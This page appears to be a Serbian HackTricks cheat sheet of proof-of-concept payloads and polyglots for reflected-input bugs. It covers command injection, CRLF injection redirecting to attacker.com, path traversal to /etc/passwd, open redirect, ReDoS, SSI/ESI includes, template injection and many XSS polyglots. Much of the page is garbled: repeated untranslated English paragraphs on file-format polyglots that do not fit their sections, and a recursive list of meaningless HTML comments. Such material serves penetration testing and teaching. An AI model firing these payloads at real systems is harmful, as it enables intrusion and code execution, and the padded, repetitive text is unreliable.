.. | ||
README.md | ||
web-vulns-list.md |
Tehnike refleksije - PoC i Polygloths CheatSheet
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Cilj ovih PoC i Polygloths je da pruže testeri brz pregled ranjivosti koje može iskoristiti ako se njegov unos na neki način reflektuje u odgovoru.
{% hint style="warning" %} Ovaj cheatsheet ne predlaže sveobuhvatnu listu testova za svaku ranjivost, samo neke osnovne. Ako tražite sveobuhvatnije testove, pristupite svakoj predloženoj ranjivosti. {% endhint %}
{% hint style="danger" %} Nećete pronaći ubrizgavanja zavisna od Content-Type-a kao što je XXE, jer ćete obično sami isprobati takve stvari ako pronađete zahtev koji šalje XML podatke. Takođe, ovde nećete pronaći ubrizgavanja baze podataka, jer čak i ako se neki sadržaj reflektuje, to zavisi u velikoj meri od tehnologije i strukture backend baze podataka. {% endhint %}
Lista Polyglotha
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Ubacivanje šablona na klijentskoj strani
Osnovni testovi
{{7*7}}
[7*7]
Poligloti
A polyglot is a file that can be interpreted as multiple file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between different file formats. By carefully crafting a file that adheres to the specifications of multiple file types, an attacker can create a polyglot that can be interpreted differently by different applications.
For example, a polyglot file may appear as a harmless image file when opened in an image viewer, but when executed as a script, it can execute malicious code. This can be used to bypass file type restrictions and upload malicious files to a web application.
Polyglots can also be used to exploit vulnerabilities in specific file parsers. By creating a file that triggers a vulnerability in a parser, an attacker can execute arbitrary code or gain unauthorized access to a system.
When conducting a penetration test, it is important to be aware of the potential for polyglots and to test for vulnerabilities in file parsers. By understanding how polyglots work and how they can be used to bypass security measures, you can better protect your systems from these types of attacks.
{{7*7}}[7*7]
Command Injection
Osnovni testovi
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Poligloti
Polyglots (also known as polyglot files) are files that can be interpreted as different file types depending on the context in which they are opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by combining the syntax and structure of multiple file types into a single file. This allows the file to be interpreted differently by different applications or systems.
For example, a polyglot file may appear as a harmless image file when opened in an image viewer, but it can also be interpreted as a JavaScript file when opened in a web browser. This can be exploited by an attacker to execute arbitrary code on a vulnerable website.
Polyglots can be used in various hacking scenarios, such as bypassing file upload filters, evading web application firewalls, or exploiting vulnerabilities in file parsers.
To create a polyglot file, you need to carefully craft the file's content to conform to the syntax and structure of multiple file types. This requires a deep understanding of the file formats involved and the ability to manipulate the file's binary representation.
Polyglots are a powerful tool in the arsenal of a hacker, as they can help bypass security measures and gain unauthorized access to systems. However, it's important to note that the creation and use of polyglots for malicious purposes is illegal and unethical.
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
CRLF
Osnovni testovi
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
Visak Markup
Osnovni Testovi
<!-- HTML Comment -->
<!-- HTML Komentar -->
<!-- HTML Comment with dangling markup -->
<!-- HTML Komentar sa visak markup-a -->
<!-- HTML Comment with dangling markup and closing tag -->
<!-- HTML Komentar sa visak markup-a i zatvarajucom oznakom -->
<!-- HTML Comment with dangling markup and self-closing tag -->
<!-- HTML Komentar sa visak markup-a i samozatvarajucom oznakom -->
<!-- HTML Comment with dangling markup and attribute -->
<!-- HTML Komentar sa visak markup-a i atributom -->
<!-- HTML Comment with dangling markup and attribute value -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa -->
<!-- HTML Comment with dangling markup and attribute value containing closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi zatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing self-closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi samozatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi atribut -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi zatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing self-closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi samozatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi atribut -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi zatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing self-closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi samozatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi atribut -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi zatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing self-closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi samozatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing attribute -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi atribut -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing attribute value -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing attribute value containing closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi zatvarajucu oznaku -->
<!-- HTML Comment with dangling markup and attribute value containing attribute value containing attribute value containing attribute value containing attribute value containing self-closing tag -->
<!-- HTML Komentar sa visak markup-a i vrednoscu atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi vrednost atributa koja sadrzi samozatvarajucu oznaku -->
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
Uključivanje datoteka/Pretraživanje putanja
Osnovni testovi
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
Otvoreno preusmeravanje / Forgiranje zahteva sa serverske strane
Osnovni testovi
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
ReDoS
Osnovni testovi
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
Uključivanje sa strane servera/Uključivanje sa strane ivice
Osnovni testovi
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Poligloti
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between different file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a web hacking engagement. For example, a polyglot file can be uploaded to a web application that performs file type validation. If the application only checks the file extension, but not the file content, it may mistakenly interpret the polyglot as a different file type, allowing an attacker to bypass security measures.
Polyglots can also be used to exploit vulnerabilities in specific file parsers. By creating a file that triggers a vulnerability in a particular parser, an attacker can execute arbitrary code or gain unauthorized access to a system.
When working with polyglots, it is important to understand the specifications of the file formats involved and the behavior of the applications that interpret them. This knowledge is crucial for crafting effective polyglots and exploiting vulnerabilities.
Poligloti
Poliglot je datoteka koja se može tumačiti kao različiti tipovi datoteka u zavisnosti od konteksta u kojem se izvršava. U kontekstu hakovanja veb stranica, poligloti se mogu koristiti za zaobilaženje sigurnosnih mera i izvršavanje zlonamernog koda.
Poligloti se obično stvaraju iskorišćavanjem sličnosti između različitih formata datoteka. Pažljivim oblikovanjem datoteke koja se pridržava specifikacija više formata datoteka, moguće je stvoriti poliglot koji se može različito tumačiti od strane različitih aplikacija.
Poligloti se mogu koristiti na različite načine tokom hakovanja veb stranica. Na primer, poliglot datoteka može se otpremiti na veb aplikaciju koja vrši validaciju tipa datoteke. Ako aplikacija proverava samo ekstenziju datoteke, ali ne i sadržaj datoteke, može greškom tumačiti poliglot kao drugi tip datoteke, omogućavajući napadaču da zaobiđe sigurnosne mere.
Poligloti se takođe mogu koristiti za iskorišćavanje ranjivosti u određenim parserima datoteka. Stvaranjem datoteke koja pokreće ranjivost u određenom parseru, napadač može izvršiti proizvoljni kod ili dobiti neovlašćen pristup sistemu.
Prilikom rada sa poliglotima, važno je razumeti specifikacije uključenih formata datoteka i ponašanje aplikacija koje ih tumače. Ovo znanje je ključno za oblikovanje efikasnih poliglota i iskorišćavanje ranjivosti.
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Forgiranje zahteva sa serverske strane
Isti testovi koji se koriste za otvoreno preusmeravanje mogu se koristiti i ovde.
Umetanje predloška sa serverske strane
Osnovni testovi
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Poligloti
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between different file formats. By carefully crafting a file that adheres to the specifications of multiple file types, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a web hacking engagement. For example, a polyglot file can be uploaded to a web application that accepts multiple file types, allowing an attacker to execute arbitrary code. Similarly, a polyglot payload can be embedded in a web page, exploiting a vulnerability in the browser or a plugin to execute malicious code.
When working with polyglots, it is important to understand the file formats involved and the specific vulnerabilities that can be exploited. Additionally, it is crucial to test the polyglot in different contexts to ensure that it behaves as expected and achieves the desired outcome.
Overall, polyglots are a powerful tool in the arsenal of a web hacker, allowing for creative and stealthy exploitation of vulnerabilities. By understanding the principles behind polyglots and their potential applications, hackers can enhance their ability to bypass security measures and achieve their objectives.
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
XSLT Server Side Injection
Osnovni testovi
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Poligloti
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between different file formats. By carefully crafting a file that adheres to the specifications of multiple file formats, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a web hacking engagement. For example, a polyglot file can be uploaded to a web application that performs file type validation. If the application only checks the file extension, but not the file content, it may mistakenly interpret the polyglot as a different file type, allowing an attacker to bypass security measures.
Polyglots can also be used to exploit vulnerabilities in specific file parsers. By creating a file that triggers a vulnerability in a particular parser, an attacker can execute arbitrary code or gain unauthorized access to a system.
When working with polyglots, it is important to understand the specifications of the file formats involved and the behavior of the applications that interpret them. This knowledge is crucial for crafting effective polyglots and exploiting vulnerabilities.
Poligloti
Poliglot je datoteka koja se može tumačiti kao različiti tipovi datoteka, zavisno od konteksta u kojem se izvršava. U kontekstu hakovanja veb stranica, poligloti se mogu koristiti za zaobilaženje sigurnosnih mera i izvršavanje zlonamernog koda.
Poligloti se obično kreiraju iskorišćavanjem sličnosti između različitih formata datoteka. Pažljivim oblikovanjem datoteke koja se pridržava specifikacija više formata datoteka, moguće je kreirati poliglot koji se može različito tumačiti od strane različitih aplikacija.
Poligloti se mogu koristiti na različite načine tokom hakovanja veb stranica. Na primer, poliglot datoteka može biti otpremljena na veb aplikaciju koja vrši validaciju tipa datoteke. Ako aplikacija proverava samo ekstenziju datoteke, ali ne i sadržaj datoteke, može se pogrešno tumačiti poliglot kao drugi tip datoteke, omogućavajući napadaču da zaobiđe sigurnosne mere.
Poligloti se takođe mogu koristiti za iskorišćavanje ranjivosti određenih parsera datoteka. Kreiranjem datoteke koja pokreće ranjivost u određenom parseru, napadač može izvršiti proizvoljni kod ili dobiti neovlašćen pristup sistemu.
Prilikom rada sa poliglotima, važno je razumeti specifikacije uključenih formata datoteka i ponašanje aplikacija koje ih tumače. Ovo znanje je ključno za oblikovanje efikasnih poliglota i iskorišćavanje ranjivosti.
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Osnovni testovi
Reflektovani XSS
Reflektovani XSS je najčešći tip XSS napada. Ovaj napad se dešava kada se korisnički unos direktno prikazuje na stranici bez ikakve validacije ili sanitizacije. Napadač može da ubaci zlonamerni kod koji će se izvršiti u browseru korisnika.
Testiranje reflektovanog XSS-a se vrši unošenjem zlonamernog koda u input polje ili URL parametar i posmatranjem da li se taj kod prikazuje na stranici. Ako se prikazuje, to znači da postoji ranjivost na reflektovani XSS.
Pohranjeni XSS
Pohranjeni XSS se dešava kada zlonamerni kod ostaje trajno sačuvan na serveru i prikazuje se svaki put kada se stranica učita. Ovaj tip XSS napada je posebno opasan jer može da utiče na sve korisnike koji posete zaraženu stranicu.
Da biste testirali pohranjeni XSS, potrebno je uneti zlonamerni kod u input polje ili bilo koji drugi oblik korisničkog unosa koji se čuva na serveru. Zatim, kada se stranica ponovo učita, proverite da li se zlonamerni kod prikazuje na stranici.
DOM bazirani XSS
DOM bazirani XSS se dešava kada se zlonamerni kod izvršava direktno u DOM-u (Document Object Model) browsera. Ovaj tip XSS napada se dešava kada se korisnički unos koristi za manipulaciju DOM-a na stranici.
Da biste testirali DOM bazirani XSS, potrebno je uneti zlonamerni kod u input polje ili URL parametar koji će biti korišćen za manipulaciju DOM-a. Zatim posmatrajte da li se zlonamerni kod izvršava u browseru korisnika.
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Poligloti
A polyglot is a file that can be interpreted as different file types depending on the context in which it is executed. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.
Polyglots are typically created by taking advantage of the similarities between different file formats. By carefully crafting a file that adheres to the specifications of multiple file types, it is possible to create a polyglot that can be interpreted differently by different applications.
Polyglots can be used in various ways during a web hacking engagement. For example, a polyglot file can be uploaded to a web application that accepts multiple file types, allowing an attacker to execute arbitrary code. Similarly, a polyglot payload can be embedded in a web page, exploiting a vulnerability in the browser or a plugin to execute malicious code.
When working with polyglots, it is important to understand the file formats involved and the specific vulnerabilities that can be exploited. Additionally, it is crucial to test the polyglot in different contexts to ensure that it behaves as expected and achieves the desired outcome.
Overall, polyglots are a powerful tool in the arsenal of a web hacker, allowing for creative and stealthy exploitation of vulnerabilities. By understanding the principles behind polyglots and their potential applications, hackers can enhance their ability to bypass security measures and achieve their objectives.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.